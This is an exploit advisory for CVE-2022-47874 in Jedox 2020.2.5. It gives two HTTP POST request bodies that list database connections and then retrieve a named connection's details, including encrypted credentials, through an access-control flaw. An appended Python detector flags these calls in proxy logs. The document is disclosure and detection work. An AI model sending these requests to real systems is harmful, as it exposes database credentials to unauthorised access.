
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874

Introduction
=================
Improper access controls in `/tc/rpc` allow remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):

    PATH: /be/rpc.php
    METHOD: POST
    BODY:
    [
        [
            "conn",
            "ls",
            [
                null,
                false,
                true,
                [
                    "type",
                    "active",
                    "description"
                ]
            ]
        ]
    ]

2) Retrieve details of a database connection (specify the connection name via CONNECTION), including encrypted credentials, using the Java RPC function `com.jedox.etl.mngr.Connections::getGlobalConnection`:

    PATH: /tc/rpc
    METHOD: POST
    BODY:
    [
        [
            "com.jedox.etl.mngr.Connections",
            "getGlobalConnection",
            [
                "<CONNECTION>"
            ]
        ]
    ]
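
One way to spot the two requests above in captured HTTP traffic, as an added example that is not part of the original advisory or of Jedox's code. The record fields (`user`, `method`, `path`, `body`) and all sample values are constructed assumptions about what a reverse proxy or WAF with request-body logging would provide.

```python
import json

# (endpoint, target, method) triples taken from the two requests in this advisory.
WATCHED = {
    ("/be/rpc.php", "conn", "ls"),
    ("/tc/rpc", "com.jedox.etl.mngr.Connections", "getGlobalConnection"),
}

def rpc_calls(body):
    """Yield (target, method, args) per call in a JSON batch body; skip malformed input."""
    try:
        batch = json.loads(body)
    except (TypeError, ValueError):
        return
    for call in batch if isinstance(batch, list) else []:
        if (isinstance(call, list) and len(call) >= 2
                and all(isinstance(x, str) for x in call[:2])):
            args = call[2] if len(call) > 2 and isinstance(call[2], list) else []
            yield call[0], call[1], args

def find_hits(records):
    """Return one finding per watched RPC call seen in POST requests."""
    hits = []
    for rec in records:
        if rec.get("method") != "POST":
            continue
        path = (rec.get("path") or "").split("?", 1)[0]
        for target, method, args in rpc_calls(rec.get("body")):
            if (path, target, method) in WATCHED:
                name = args[0] if args and isinstance(args[0], str) else None
                hits.append({"user": rec.get("user"), "path": path,
                             "call": f"{target}::{method}", "connection": name})
    return hits

def enumerate_then_read(hits):
    """Users who made both calls: listed connections, then read one by name."""
    seen = {}
    for h in hits:
        seen.setdefault(h["user"], set()).add(h["call"])
    return sorted(u for u, c in seen.items() if u and len(c) == len(WATCHED))

# Constructed sample records (hypothetical users and connection name).
SAMPLE = [
    {"user": "alice", "method": "POST", "path": "/be/rpc.php",
     "body": '[["conn","ls",[null,false,true,["type","active","description"]]]]'},
    {"user": "alice", "method": "POST", "path": "/tc/rpc?x=1", "body":
     '[["com.jedox.etl.mngr.Connections","getGlobalConnection",["ExampleConn"]]]'},
    {"user": "bob", "method": "POST", "path": "/tc/rpc", "body": "not json"},
    {"user": "bob", "method": "GET", "path": "/tc/rpc", "body": None},
]
```

Whether a given user is expected to make these calls is a local policy decision; the functions only report who made them and which connection name was requested.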